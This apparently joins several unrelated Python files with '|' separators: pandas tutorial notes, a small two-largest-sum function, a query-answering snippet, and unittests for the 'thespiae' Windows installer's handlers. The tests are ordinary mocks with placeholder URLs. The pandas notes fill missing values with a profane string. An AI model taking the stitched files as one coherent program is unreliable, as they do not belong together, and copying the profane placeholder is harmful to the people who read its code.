print(se1,'\n',se2,'\n')
print(se1+se2) # values under matching labels are added; labels present in only one Series yield NaN
print(se1['NK']) # label-based lookup, similar to list indexing
#####################
# ---- Building and slicing a DataFrame ----
np.random.seed(101) # fixed seed so the random numbers (and printed output) are reproducible
df=pd.DataFrame(np.random.randn(4,5),index='a b c d'.split(),columns=['v','w','x','y','z'])
print(df)
# Selecting columns.
print(df[['x','y']]) # a list of names selects multiple columns (note the double brackets)
print(type(df['w'])) # a single column comes back as a pandas Series
df['total']=df['v']+df['w']+df['x']+df['y']+df['z']
print(df,'\n')
# Selecting rows.
print(df.loc['a'])
print(df.iloc[0]) # by positional index
print('\n')
# Selecting a single element.
print('a,y has',df.loc['a','y'])
print('\n')
print(df.drop('d',axis=0)) # returns a copy with the row dropped; df itself is unchanged
df.drop('total',axis=1,inplace=True)# inplace=True mutates df, permanently removing the column
print(df)
####################
# ---- Conditional selection ----
print(df>0) # element-wise comparison returns a boolean DataFrame
print(df[df>0]) # boolean mask keeps matching values, everything else becomes NaN
print('\n\nonly rows allowed for y>0')
print(df[df['y']>0]) # keeps only the rows where column 'y' is positive
print(df[df['y']>0][['x','z']]) # same row filter, then select columns 'x' and 'z' from the result
print( df[ (df['v']>1) & (df['w']<0) ] ) # combine conditions with & (rows where v>1 AND w<0)
# May be empty when no row satisfies both conditions at once.
print('\n\n')
# Reset the index back to 0..n-1 (old index becomes a column).
print(df.reset_index())
# Set (change) the index to an existing column.
df['countries']=['US','UK','Ukarine','Urine'] #insert a new column
df.set_index('countries',inplace=True) # without inplace=True the change would be temporary
print(df,'\n')
#####################
# ---- Index hierarchy (MultiIndex) ----
outside ='A A B B'.split()
inside ='1 2 1 2'.split()
hier_index = list(zip(outside,inside)) # pair up the two label lists
print(hier_index)
hier_index = pd.MultiIndex.from_tuples(hier_index) # turn the tuples into a MultiIndex
print(hier_index)
df.set_index(hier_index,inplace=True)
print(df,'\n')
###################
# Naming the index levels.
print('named')
df.index.names= ['Class','room']
print(df,'\n')
##################
# ---- Indexing a MultiIndex ----
print(df.loc['A'].loc['1'] , '\n') # row ('A', '1')
print(df.xs('A')) # all rows under outer label 'A'
print(df.xs(['A','1'])) # another way to get row ('A', '1')  # NOTE(review): list keys to xs are deprecated in newer pandas — use a tuple
# To search within a named level, pass level='level_name'.
print(df.xs('1',level='room')) # rows with inner label '1' across all outer labels
##################
# ---- Dealing with missing data ----
df = df[df>0]
print(df)
print(df.isnull()) # True where a value is NaN (inverse of the df>0 mask above)
print(df.fillna(axis=1,value='FUCK')) # replace NaN values  # NOTE(review): fillna with axis=1 may be unsupported in newer pandas — confirm version
print(df.dropna(axis=1)) # drop columns containing NaN
print(df.dropna(axis=0,thresh=4)) # keep only rows with at least `thresh` non-NaN values
print('\n')
dfw = df['w'].fillna(value=df['w'].mean())
print('w nan is filled with mean\n',dfw)
print('\n')
##################
# ---- Grouping ----
data = {
    'Company':['GOOG','GOOG','MSFT','MSFT','FB','FB'],
    'Person':['Sam','Charlie','Amy','Vanessa','Carl','Sarah'],
    'Sales':[200,120,340,124,243,350]
}
df=pd.DataFrame(data)
print(df)
comp_gp = df.groupby("Company")
print(comp_gp.describe().transpose())
# Other common aggregations on a GroupBy object:
#   mean()
#   min()
#   max()
#   std()
#   count() - number of rows in each group
# Extracting the stats for a single group from the transposed describe().
fb = comp_gp.describe().transpose()['FB']
print(fb)
print('\n')
#################
# ---- DataFrame merge, join, concatenation ----
# Concatenation: glue frames together along an axis.
df1= pd.DataFrame(
    {
        'A':'A0 A1 A2'.split(),
        'B':'B0 B1 B2'.split(),
        'C':'C0 C1 C2'.split()
    },index=[0,1,2])
df2= pd.DataFrame(
    {
        'A':'A3 A4 A5'.split(),
        'B':'B3 B4 B5'.split(),
        'C':'C3 C4 C5'.split()
    }, index=[3,4,5])
df3= pd.DataFrame(
    {
        'A':'A6 A7 A8'.split(),
        'B':'B6 B7 B8'.split(),
        'C':'C6 C7 C8'.split()
    },index=[6,7,8])
df = pd.concat([df1,df2,df3],axis=1) # axis=0 stacks rows, axis=1 places frames side by side; indexes must align
print(df)
# Merging: SQL-style join on one or more key columns.
df1= pd.DataFrame(
    {
        'A':'A0 A1 A2'.split(),
        'B':'B0 B1 B2'.split(),
        'C':'C0 C1 C2'.split()
    },index=[0,1,2])
df2= pd.DataFrame(
    {
        'C':'C0 C1 C2'.split(),
        'D':'D0 D1 D2'.split(),
        'E':'E0 E1 E2'.split()
    }, index=[0,1,2])
# The frames need a common key column to merge on (here 'C').
df = pd.merge(df1,df2,how='inner',on='C')
print(df)
# Variants:
#   merge(df1,df2,on=['key1','key2'])
#   merge(df1,df2,how='outer',on=['key1','key2'])
#   merge(df1,df2,how='right',on=['key1','key2'])
#   merge(df1,df2,how='left',on=['key1','key2'])
# Joining: combine on the index instead of a key column.
left = pd.DataFrame(
    {
        'A': ['A0', 'A1', 'A2'],
        'B': ['B0', 'B1', 'B2']
    },index=['K0', 'K1', 'K2'])
right = pd.DataFrame(
    {
        'C': ['C0', 'C2', 'C3'],
        'D': ['D0', 'D2', 'D3']
    },index=['K0', 'K2', 'K3'])
print(left.join(right)) # how='inner' keeps only fully-matched rows; how='outer' keeps every row (with NaNs)
# The default (how='left') keeps all rows of `left`; `right` rows are aligned to it.
print('\n')
###################
# ---- Common operations ----
df = pd.DataFrame({'col1':[1,2,3,4],'col2':[444,555,666,444],'col3':['abc','def','ghi','xyz']})
print(df.head()) # first n rows (default 5)
print('unique af',df['col2'].unique()) # array of the distinct values
print('index',df['col2'].nunique()) # NUMBER of distinct values (an int, not their indexes)
print('counts are-\n',df['col2'].value_counts()) # how many times each value occurs
# Indexing / conditional selection.
print ( df[(df['col1']>2) & (df['col2']==444)] )
#########################
# Applying a function element-wise with .apply(func).
def times2(x):
    return x*2
df['col1*2'] = df['col1'].apply(times2)
print(df)
print('col3 has strings their lengths are-')
print(df['col3'].apply(len))
# .sum() totals everything in a column.
#########################
# Deleting a column in place with `del`.
print('we don\'t need them we delete')
del df['col3']
print(df)
#########################
# Getting index and columns:
#   df.index   - the row index
#   df.columns - the column labels
#########################
# Sorting.
df.sort_values(by='col2',ascending=True,inplace=True) # ascending=False for descending order
print('sorted df')
print(df,'\n')
#########################
# pivot_table: reshape with row/column keys and an aggregated value column.
data = {'A':['foo','foo','foo','bar','bar','bar'],
        'B':['one','one','two','two','one','one'],
        'C':['x','y','x','y','x','y'],
        'D':[1,3,2,5,4,1]}
df = pd.DataFrame(data)
print(df)
print('\nchanged\n')
df = df.pivot_table(values='D',index=['A','B'],columns=['C'])
print(df)
#######################
# ---- Data input / output ----
# df = pd.read_csv('file.csv') #read csv file
# df.to_csv('example1',index=False) #write csv file
# df = pd.read_excel('file.xlsx',sheetname='Sheet1') #read excel file  # NOTE(review): newer pandas spells this sheet_name
# df.to_excel('Excel_Sample.xlsx',sheet_name='Sheet1') #write excel file
# Reading HTML tables (returns a list of DataFrames):
# df = pd.read_html('http://www.fdic.gov/bank/individual/failed/banklist.html')
|
def m_func(n_1, n_2, n_3):
    """Return the sum of the two largest of the three arguments.

    If the values cannot be ordered or summed together (e.g. mixed
    incompatible types), the string 'Error' is returned instead of raising.
    """
    try:
        # Sorting and dropping the smallest is equivalent to removing min().
        ordered = sorted([n_1, n_2, n_3])
        return sum(ordered[1:])
    except TypeError:
        return 'Error'


print(m_func(n_1=15, n_2=5, n_3=10))
|
# Reads n values t[0..n-1], then m queries (p, x).  Each query asks:
# "what would the total be if the value of item p (1-based) were replaced
# by x?" — queries are independent of each other.
n = int(input())
t = list(map(int, input().split()))
m = int(input())
P, X = [], []
for i in range(m):
    p, x = map(int, input().split())
    P.append(p)
    X.append(x)
# s: total of all original values; dic: index -> original value.
s = 0
dic = {}
for i in range(n):
    s += t[i]
    dic[i] = t[i]
# Answer each query as (total - old value + replacement).
for i in range(m):
    k = dic[P[i]-1]
    print(s-k+X[i])
|
#
# SPDX-License-Identifier: Apache-2.0
#
# Copyright 2020 Andrey Pleshakov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from dataclasses import replace
from pathlib import Path
from unittest import TestCase
from unittest.mock import call, NonCallableMock
from thespiae.conf import AppData, AppEntry
from thespiae.conf.core import get_app_config_from
from thespiae.install.exception import InvalidOrMissingAppDataError, InterruptedFileOperationsError, \
UnknownInstallTypeError, UnknownUninstallTypeError
from thespiae.install.protocol import Feedback
from .helper import set_install_manager_data, InstallManagerMockResetMixin, DownloadManagerMockResetMixin, \
ExtraAssertMixin, set_download_manager_data
from .singleton import exe_install_handler, msi_install_handler, command_install_handler, install_manager, \
software_processor, download_manager, exe_uninstall_handler, msi_uninstall_handler, command_uninstall_handler, \
file_install_handler, file_uninstall_handler, archive_install_handler, archive_uninstall_handler
from ..conf.helper import load_yaml_from_test_dir
# Shared fixture: an app entry installed/uninstalled via a plain .exe installer.
_exe_entry1 = AppEntry(name='test', installer_url='http://example.com/123.exe', file_hash='4567', version='890',
                       uninstaller_path='123.exe', install_args=['a'], uninstall_args=['b'])
class ExeInstallHandlerTest(InstallManagerMockResetMixin, TestCase):
    """Tests for the .exe install handler: applicability, download-spec
    layout (name/version/architecture directory scheme) and installation."""
    def test_applicability(self):
        # An entry with installer_url is handled by the exe installer.
        self.assertTrue(exe_install_handler.is_applicable(_exe_entry1))
    def test_applicability2(self):
        self.assertFalse(exe_install_handler.is_applicable(replace(_exe_entry1, installer_url=None)))
    def test_creating_download_spec(self):
        # Download path layout: <root>\<name>\<version>\<name>_<version>.exe
        spec = exe_install_handler.create_download_spec(_exe_entry1, 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/123.exe')
        self.assertEqual(spec.download_path, 'C:\\test\\890\\test_890.exe')
        self.assertEqual(spec.hash, '4567')
        self.assertEqual(spec.name, 'test')
        self.assertEqual(spec.version, '890')
    def test_creating_download_spec2(self):
        # An empty name is rejected with a descriptive error.
        e = replace(_exe_entry1, name='')
        with self.assertRaises(InvalidOrMissingAppDataError) as c:
            exe_install_handler.create_download_spec(e, 'C:\\')
        self.assertEqual(c.exception.app_entry, e)
        self.assertEqual(c.exception.key, 'name')
        self.assertEqual(c.exception.value, '')
    def test_creating_download_spec3(self):
        # Without a version the path collapses to <root>\<name>\<name>.exe.
        spec = exe_install_handler.create_download_spec(replace(_exe_entry1, version=None), 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/123.exe')
        self.assertEqual(spec.download_path, 'C:\\test\\test.exe')
        self.assertEqual(spec.hash, '4567')
        self.assertEqual(spec.name, 'test')
    def test_creating_download_spec4(self):
        # Architecture adds one more path segment and a filename suffix.
        spec = exe_install_handler.create_download_spec(replace(_exe_entry1, architecture='x86_64'), 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/123.exe')
        self.assertEqual(spec.download_path, 'C:\\test\\890\\x86_64\\test_890_x86_64.exe')
        self.assertEqual(spec.hash, '4567')
        self.assertEqual(spec.name, 'test')
        self.assertEqual(spec.version, '890')
        self.assertEqual(spec.architecture, 'x86_64')
    def test_installing(self):
        # Installing runs the downloaded file with the entry's install args.
        ds = exe_install_handler.create_download_spec(_exe_entry1, 'C:\\')
        exe_install_handler.install(_exe_entry1, ds)
        install_manager.run_file.assert_called_once_with('C:\\test\\890\\test_890.exe', ['a'])
class ExeUninstallHandlerTest(InstallManagerMockResetMixin, TestCase):
    """Tests for the .exe uninstall handler (keyed on uninstaller_path)."""
    def test_applicability(self):
        self.assertTrue(exe_uninstall_handler.is_applicable(_exe_entry1))
    def test_applicability2(self):
        self.assertFalse(exe_uninstall_handler.is_applicable(replace(_exe_entry1, uninstaller_path=None)))
    def test_is_installed_checking(self):
        # Installed-state is detected by the uninstaller file's presence.
        set_install_manager_data(True, None, None)
        self.assertTrue(exe_uninstall_handler.is_installed(_exe_entry1))
        install_manager.is_file_present.assert_called_once_with('123.exe')
    def test_uninstalling(self):
        # Uninstalling runs the uninstaller with the entry's uninstall args.
        exe_uninstall_handler.uninstall(_exe_entry1)
        install_manager.run_file.assert_called_once_with('123.exe', ['b'])
# Shared fixture: an app entry installed via an MSI package, identified for
# uninstall by its Windows Installer product code.
_msi_entry1 = AppEntry(name='test', version='890', package_url='http://example.com/123.msi', product_code='123',
                       file_hash='4567', install_args=['a'], uninstall_args=['b'])
class MSIInstallHandlerTest(InstallManagerMockResetMixin, TestCase):
    """Tests for the MSI install handler; mirrors ExeInstallHandlerTest but
    keys on package_url and installs through install_msi."""
    def test_applicability(self):
        self.assertTrue(msi_install_handler.is_applicable(_msi_entry1))
    def test_applicability2(self):
        self.assertFalse(msi_install_handler.is_applicable(replace(_msi_entry1, package_url=None)))
    def test_creating_download_spec(self):
        # Download path layout: <root>\<name>\<version>\<name>_<version>.msi
        spec = msi_install_handler.create_download_spec(_msi_entry1, 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/123.msi')
        self.assertEqual(spec.download_path, 'C:\\test\\890\\test_890.msi')
        self.assertEqual(spec.hash, '4567')
        self.assertEqual(spec.name, 'test')
        self.assertEqual(spec.version, '890')
    def test_creating_download_spec2(self):
        # An empty name is rejected with a descriptive error.
        e = replace(_msi_entry1, name='')
        with self.assertRaises(InvalidOrMissingAppDataError) as c:
            msi_install_handler.create_download_spec(e, 'C:\\')
        self.assertEqual(c.exception.app_entry, e)
        self.assertEqual(c.exception.key, 'name')
        self.assertEqual(c.exception.value, '')
    def test_creating_download_spec3(self):
        # Without a version the path collapses to <root>\<name>\<name>.msi.
        spec = msi_install_handler.create_download_spec(replace(_msi_entry1, version=None), 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/123.msi')
        self.assertEqual(spec.download_path, 'C:\\test\\test.msi')
        self.assertEqual(spec.hash, '4567')
        self.assertEqual(spec.name, 'test')
    def test_creating_download_spec4(self):
        # Architecture adds one more path segment and a filename suffix.
        spec = msi_install_handler.create_download_spec(replace(_msi_entry1, architecture='x86_64'), 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/123.msi')
        self.assertEqual(spec.download_path, 'C:\\test\\890\\x86_64\\test_890_x86_64.msi')
        self.assertEqual(spec.hash, '4567')
        self.assertEqual(spec.name, 'test')
        self.assertEqual(spec.version, '890')
        self.assertEqual(spec.architecture, 'x86_64')
    def test_installing(self):
        msi_install_handler.install(_msi_entry1, msi_install_handler.create_download_spec(_msi_entry1, 'C:\\'))
        install_manager.install_msi.assert_called_once_with('C:\\test\\890\\test_890.msi', ['a'])
class MSIUninstallHandlerTest(InstallManagerMockResetMixin, TestCase):
    """Tests for the MSI uninstall handler (keyed on product_code)."""
    def test_applicability(self):
        self.assertTrue(msi_uninstall_handler.is_applicable(_msi_entry1))
    def test_applicability2(self):
        self.assertFalse(msi_uninstall_handler.is_applicable(replace(_msi_entry1, product_code=None)))
    def test_is_installed_checking(self):
        # Installed-state is detected via the registered MSI product code.
        set_install_manager_data(None, True, None)
        self.assertTrue(msi_uninstall_handler.is_installed(_msi_entry1))
        install_manager.is_product_code_present.assert_called_once_with('123')
    def test_uninstalling(self):
        msi_uninstall_handler.uninstall(_msi_entry1)
        install_manager.uninstall_msi.assert_called_once_with('123', ['b'])
# Shared fixture: an app entry managed through an external package-manager
# command; installed-state is detected by grepping the manager's list output.
_command_entry1 = AppEntry(name='test', version='456', command='testc', install_args=['a'], list_args=['b'],
                           installed_list_entry='123:456', uninstall_args=['c'])
class CommandInstallHandlerTest(InstallManagerMockResetMixin, TestCase):
    """Tests for the command-based install handler.

    Fix: test_applicability2 and test_creating_download_spec previously
    operated on the MSI fixture (_msi_entry1) — an apparent copy-paste slip
    from MSIInstallHandlerTest.  They now use the command fixture so they
    actually exercise the command handler's own entry shape.
    """

    def test_applicability(self):
        # An entry with a command is handled by the command installer.
        self.assertTrue(command_install_handler.is_applicable(_command_entry1))

    def test_applicability2(self):
        # Without a command the handler must not claim the entry.
        self.assertFalse(command_install_handler.is_applicable(replace(_command_entry1, command=None)))

    def test_creating_download_spec(self):
        # Command-based installs download nothing, so no spec is produced.
        self.assertIsNone(command_install_handler.create_download_spec(_command_entry1, 'C:\\'))

    def test_installing(self):
        # Installing runs the manager command with the install args.
        command_install_handler.install(_command_entry1, None)
        install_manager.run_command.assert_called_once_with('testc', ['a'])
class CommandUninstallHandlerTest(InstallManagerMockResetMixin, TestCase):
    """Tests for the command-based uninstall handler: requires list_args and
    installed_list_entry to detect installed state from list output."""
    def test_applicability(self):
        self.assertTrue(command_uninstall_handler.is_applicable(_command_entry1))
    def test_applicability2(self):
        self.assertFalse(command_uninstall_handler.is_applicable(replace(_command_entry1, list_args=None)))
    def test_applicability3(self):
        self.assertFalse(command_uninstall_handler.is_applicable(replace(_command_entry1, installed_list_entry=None)))
    def test_is_installed_checking(self):
        # The entry's installed_list_entry ('123:456') appears as one CRLF
        # line of the mocked `testc b` output, so it counts as installed.
        set_install_manager_data(None, None, 'a:b\r\n123:456\r\nc:d\r\n')
        self.assertTrue(command_uninstall_handler.is_installed(_command_entry1))
        install_manager.run_command.assert_called_once_with('testc', ['b'])
    def test_uninstalling(self):
        command_uninstall_handler.uninstall(_command_entry1)
        install_manager.run_command.assert_called_once_with('testc', ['c'])
# Shared fixture: an app entry "installed" by copying a single downloaded
# file into a target directory under a given name.
_file_entry1 = AppEntry(name='123', version='456', file_url='http://example.com/1.txt',
                        file_directory=r'C:\test\test2', file_name='test.txt', file_hash='789')
class FileInstallTestCase(InstallManagerMockResetMixin, TestCase):
    """Tests for the single-file install handler: needs file_url,
    file_directory and file_name; install copies the downloaded file."""
    def test_applicability(self):
        self.assertTrue(file_install_handler.is_applicable(_file_entry1))
    def test_applicability2(self):
        self.assertFalse(file_install_handler.is_applicable(replace(_file_entry1, file_url=None)))
    def test_applicability3(self):
        self.assertFalse(file_install_handler.is_applicable(replace(_file_entry1, file_directory=None)))
    def test_applicability4(self):
        self.assertFalse(file_install_handler.is_applicable(replace(_file_entry1, file_name=None)))
    def test_creating_download_spec(self):
        # File downloads also carry a .part path for resumable downloads.
        spec = file_install_handler.create_download_spec(_file_entry1, 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/1.txt')
        self.assertEqual(spec.download_path, 'C:\\123\\456\\123_456.txt')
        self.assertEqual(spec.part_path, 'C:\\123\\456\\123_456.txt.part')
        self.assertEqual(spec.hash, '789')
        self.assertEqual(spec.name, '123')
        self.assertEqual(spec.version, '456')
    def test_creating_download_spec2(self):
        # Without a version the path collapses to <root>\<name>\<name>.txt.
        spec = file_install_handler.create_download_spec(replace(_file_entry1, version=None), 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/1.txt')
        self.assertEqual(spec.download_path, 'C:\\123\\123.txt')
        self.assertEqual(spec.part_path, 'C:\\123\\123.txt.part')
        self.assertEqual(spec.hash, '789')
        self.assertEqual(spec.name, '123')
    def test_creating_download_spec3(self):
        # Architecture adds one more path segment and a filename suffix.
        spec = file_install_handler.create_download_spec(replace(_file_entry1, architecture='x86_64'), 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/1.txt')
        self.assertEqual(spec.download_path, 'C:\\123\\456\\x86_64\\123_456_x86_64.txt')
        self.assertEqual(spec.part_path, 'C:\\123\\456\\x86_64\\123_456_x86_64.txt.part')
        self.assertEqual(spec.hash, '789')
        self.assertEqual(spec.name, '123')
        self.assertEqual(spec.version, '456')
    def test_installing(self):
        # Install copies the downloaded file into file_directory as file_name.
        file_install_handler.install(_file_entry1, file_install_handler.create_download_spec(_file_entry1, 'C:\\'))
        install_manager.copy_file.assert_called_once_with('C:\\123\\456\\123_456.txt', Path('C:/test/test2'),
                                                          'test.txt')
    def test_installing2(self):
        # An empty file_directory is rejected with a descriptive error.
        e = replace(_file_entry1, file_directory=[])
        with self.assertRaises(InvalidOrMissingAppDataError) as c:
            file_install_handler.install(e, file_install_handler.create_download_spec(e, 'C:\\'))
        self.assertEqual(c.exception.app_entry, e)
        self.assertEqual(c.exception.key, 'file_directory')
        self.assertEqual(c.exception.value, [])
    def test_installing4(self):
        # OS failures during the copy surface as InterruptedFileOperationsError.
        install_manager.copy_file.side_effect = OSError
        with self.assertRaises(InterruptedFileOperationsError) as c:
            file_install_handler.install(_file_entry1, file_install_handler.create_download_spec(_file_entry1, 'C:\\'))
        self.assertEqual(c.exception.app_entry, _file_entry1)
        self.assertEqual(c.exception.root_directory, r'C:\test\test2')
class FileUninstallTestCase(InstallManagerMockResetMixin, TestCase):
    """Tests for the single-file uninstall handler: removal of the copied
    file and error translation for OS failures."""
    def test_applicability(self):
        self.assertTrue(file_uninstall_handler.is_applicable(_file_entry1))
    def test_applicability2(self):
        self.assertFalse(file_uninstall_handler.is_applicable(replace(_file_entry1, file_directory=None)))
    def test_applicability3(self):
        self.assertFalse(file_uninstall_handler.is_applicable(replace(_file_entry1, file_name=None)))
    def test_is_installed(self):
        # Installed-state is detected by the target file's presence.
        file_uninstall_handler.is_installed(_file_entry1)
        install_manager.is_file_present.assert_called_once_with('C:\\test\\test2\\test.txt')
    def test_uninstalling(self):
        file_uninstall_handler.uninstall(_file_entry1)
        install_manager.remove_file.assert_called_once_with(Path('C:/test/test2'), 'test.txt')
    def test_uninstalling2(self):
        # An empty file_directory is rejected with a descriptive error.
        e = replace(_file_entry1, file_directory=[])
        with self.assertRaises(InvalidOrMissingAppDataError) as c:
            file_uninstall_handler.uninstall(e)
        self.assertEqual(c.exception.app_entry, e)
        self.assertEqual(c.exception.key, 'file_directory')
        self.assertEqual(c.exception.value, [])
    def test_uninstalling4(self):
        # OS failures during removal surface as InterruptedFileOperationsError.
        install_manager.remove_file.side_effect = OSError
        with self.assertRaises(InterruptedFileOperationsError) as c:
            file_uninstall_handler.uninstall(_file_entry1)
        self.assertEqual(c.exception.app_entry, _file_entry1)
        self.assertEqual(c.exception.root_directory, r'C:\test\test2')
# Shared fixture: an app entry installed by downloading an archive and
# unpacking it into unpack_directory using the declared archive_format.
_archive_entry1 = AppEntry(name='123', version='456', archive_url='http://example.com/1.file',
                           unpack_directory=r'C:\test\test2', archive_format='zip', file_hash='789')
class ArchiveInstallHandlerTestCase(InstallManagerMockResetMixin, TestCase):
    """Tests for the archive (zip) install handler.

    Fix: this class now mixes in InstallManagerMockResetMixin like every
    sibling handler test.  Without it, test_installing4's
    ``install_manager.unpack_archive.side_effect = OSError`` was never reset
    on the shared singleton mock and could leak into other test classes.
    """

    def test_applicability(self):
        self.assertTrue(archive_install_handler.is_applicable(_archive_entry1))

    def test_applicability2(self):
        self.assertFalse(archive_install_handler.is_applicable(replace(_archive_entry1, archive_url=None)))

    def test_applicability3(self):
        # NOTE(review): duplicates test_applicability2 (same archive_url=None
        # replacement) — possibly a different field was intended; confirm.
        self.assertFalse(archive_install_handler.is_applicable(replace(_archive_entry1, archive_url=None)))

    def test_applicability4(self):
        self.assertFalse(archive_install_handler.is_applicable(replace(_archive_entry1, archive_format=None)))

    def test_creating_download_spec(self):
        # The archive is stored with the format as its extension and a .part
        # path for resumable downloads.
        spec = archive_install_handler.create_download_spec(_archive_entry1, 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/1.file')
        self.assertEqual(spec.download_path, 'C:\\123\\456\\123_456.zip')
        self.assertEqual(spec.part_path, 'C:\\123\\456\\123_456.zip.part')
        self.assertEqual(spec.hash, '789')
        self.assertEqual(spec.name, '123')
        self.assertEqual(spec.version, '456')

    def test_creating_download_spec2(self):
        # Without a version the path collapses to <root>\<name>\<name>.zip.
        spec = archive_install_handler.create_download_spec(replace(_archive_entry1, version=None), 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/1.file')
        self.assertEqual(spec.download_path, 'C:\\123\\123.zip')
        self.assertEqual(spec.part_path, 'C:\\123\\123.zip.part')
        self.assertEqual(spec.hash, '789')
        self.assertEqual(spec.name, '123')

    def test_creating_download_spec3(self):
        # Architecture adds one more path segment and a filename suffix.
        spec = archive_install_handler.create_download_spec(replace(_archive_entry1, architecture='x86_64'), 'C:\\')
        self.assertEqual(spec.url, 'http://example.com/1.file')
        self.assertEqual(spec.download_path, 'C:\\123\\456\\x86_64\\123_456_x86_64.zip')
        self.assertEqual(spec.part_path, 'C:\\123\\456\\x86_64\\123_456_x86_64.zip.part')
        self.assertEqual(spec.hash, '789')
        self.assertEqual(spec.name, '123')
        self.assertEqual(spec.version, '456')

    def test_installing(self):
        # Install unpacks the downloaded archive into unpack_directory.
        archive_install_handler.install(_archive_entry1, archive_install_handler.create_download_spec(_archive_entry1,
                                                                                                     'C:\\'))
        install_manager.unpack_archive.assert_called_once_with(r'C:\123\456\123_456.zip', 'zip',
                                                               Path('C:/test/test2'))

    def test_installing2(self):
        # A missing unpack_directory is rejected with a descriptive error.
        e = replace(_archive_entry1, unpack_directory=None)
        with self.assertRaises(InvalidOrMissingAppDataError) as c:
            archive_install_handler.install(e, archive_install_handler.create_download_spec(e, 'C:\\'))
        self.assertEqual(c.exception.app_entry, e)
        self.assertEqual(c.exception.key, 'unpack_directory')
        self.assertEqual(c.exception.value, None)

    def test_installing4(self):
        # OS failures while unpacking surface as InterruptedFileOperationsError.
        install_manager.unpack_archive.side_effect = OSError
        with self.assertRaises(InterruptedFileOperationsError) as c:
            archive_install_handler.install(_archive_entry1,
                                            archive_install_handler.create_download_spec(_archive_entry1, 'C:\\'))
        self.assertEqual(c.exception.app_entry, _archive_entry1)
        self.assertEqual(c.exception.root_directory, r'C:\test\test2')
class ArchiveUninstallTestCase(InstallManagerMockResetMixin, TestCase):
    """Tests for the archive uninstall handler: needs only unpack_directory
    (archive_format is irrelevant once unpacked); uninstall removes it."""
    def test_applicability(self):
        self.assertTrue(archive_uninstall_handler.is_applicable(_archive_entry1))
    def test_applicability2(self):
        self.assertFalse(archive_uninstall_handler.is_applicable(replace(_archive_entry1, unpack_directory=None)))
    def test_applicability3(self):
        # Still applicable without archive_format — only the directory matters.
        self.assertTrue(archive_uninstall_handler.is_applicable(replace(_archive_entry1, archive_format=None)))
    def test_is_installed(self):
        # Installed-state is detected by the unpack directory's presence.
        archive_uninstall_handler.is_installed(_archive_entry1)
        install_manager.is_file_present.assert_called_once_with(r'C:\test\test2')
    def test_uninstalling(self):
        archive_uninstall_handler.uninstall(_archive_entry1)
        install_manager.remove_directory.assert_called_once_with(Path('C:/test/test2'))
    def test_uninstalling2(self):
        # A missing unpack_directory is rejected with a descriptive error.
        e = replace(_archive_entry1, unpack_directory=None)
        with self.assertRaises(InvalidOrMissingAppDataError) as c:
            archive_uninstall_handler.uninstall(e)
        self.assertEqual(c.exception.app_entry, e)
        self.assertEqual(c.exception.key, 'unpack_directory')
        self.assertEqual(c.exception.value, None)
    def test_uninstalling4(self):
        # OS failures during removal surface as InterruptedFileOperationsError.
        install_manager.remove_directory.side_effect = OSError
        with self.assertRaises(InterruptedFileOperationsError) as c:
            archive_uninstall_handler.uninstall(_archive_entry1)
        self.assertEqual(c.exception.app_entry, _archive_entry1)
        self.assertEqual(c.exception.root_directory, r'C:\test\test2')
class SoftwareProcessorTestCase(InstallManagerMockResetMixin, DownloadManagerMockResetMixin, ExtraAssertMixin,
                                TestCase):
    """End-to-end tests for the software processor: it should download what
    is missing, install everything not yet installed, remove what is marked
    for removal, and drive the Feedback protocol in the right order."""
    def test_processing(self):
        # Nothing installed yet; only the MSI package is already downloaded,
        # so every handler's install path (and no uninstall path) must run.
        fb = NonCallableMock(spec_set=Feedback)
        set_install_manager_data(False, False, '')
        set_download_manager_data({'C:\\temp\\example2\\0.1b\\example2_0.1b.msi'})
        data = get_app_config_from(load_yaml_from_test_dir('app_list'))
        software_processor.process('C:\\temp', data, fb)
        specs = [exe_install_handler.create_download_spec(data.to_install[0], 'C:\\temp'),
                 msi_install_handler.create_download_spec(data.to_install[1], 'C:\\temp'),
                 file_install_handler.create_download_spec(data.to_install[3], 'C:\\temp'),
                 archive_install_handler.create_download_spec(data.to_install[4], 'C:\\temp')]
        download_manager.filter_present.assert_called_once_with(specs)
        # The already-present MSI spec (specs[1]) must not be re-downloaded.
        download_manager.download.assert_called_once_with(specs[:1] + specs[2:], fb)
        fb.report_checking_software.assert_called_once()
        install_manager.uninstall_msi.assert_not_called()
        install_manager.copy_file.assert_called_once_with('C:\\temp\\example4\\x86_64\\example4_x86_64.exe',
                                                          Path('C:/temp/example4'), 'example4.exe')
        install_manager.unpack_archive.assert_called_once_with(r'C:\temp\example5\0.6\x86_64\example5_0.6_x86_64.zip',
                                                               'zip', Path('C:/temp/example5/0.6'))
        self.assert_called_exactly_with_no_order(install_manager.run_file,
                                                 call('C:\\temp\\example1\\1.1\\example1_1.1.exe',
                                                      ['/SILENT', '/DIR=C:\\Program Files\\Example1\\1.1']))
        self.assert_called_exactly_with_no_order(install_manager.run_command,
                                                 call('manager', ['list']), call('manager', ['list']),
                                                 call('manager', ['install', 'example3:1.1']))
        self.assert_called_exactly_with_no_order(install_manager.install_msi,
                                                 call('C:\\temp\\example2\\0.1b\\example2_0.1b.msi',
                                                      ['/q', 'INSTALLDIR=C:\\Program Files\\Example2']))
        fb.confirm_operations.assert_called_once_with(specs[:1] + specs[2:], [], list(data.to_install))
        fb.report_removal_started.assert_not_called()
        fb.report_removal_finished.assert_not_called()
        fb.report_installation_started.assert_called_once()
        fb.report_installation_finished.assert_called_once()
        self.assert_called_exactly_with_no_order(fb.report_entry_installation_started,
                                                 *(call(item) for item in data.to_install))
        self.assert_called_exactly_with_no_order(fb.report_entry_installation_finished,
                                                 *(call(item) for item in data.to_install))
        fb.report_entry_removal_started.assert_not_called()
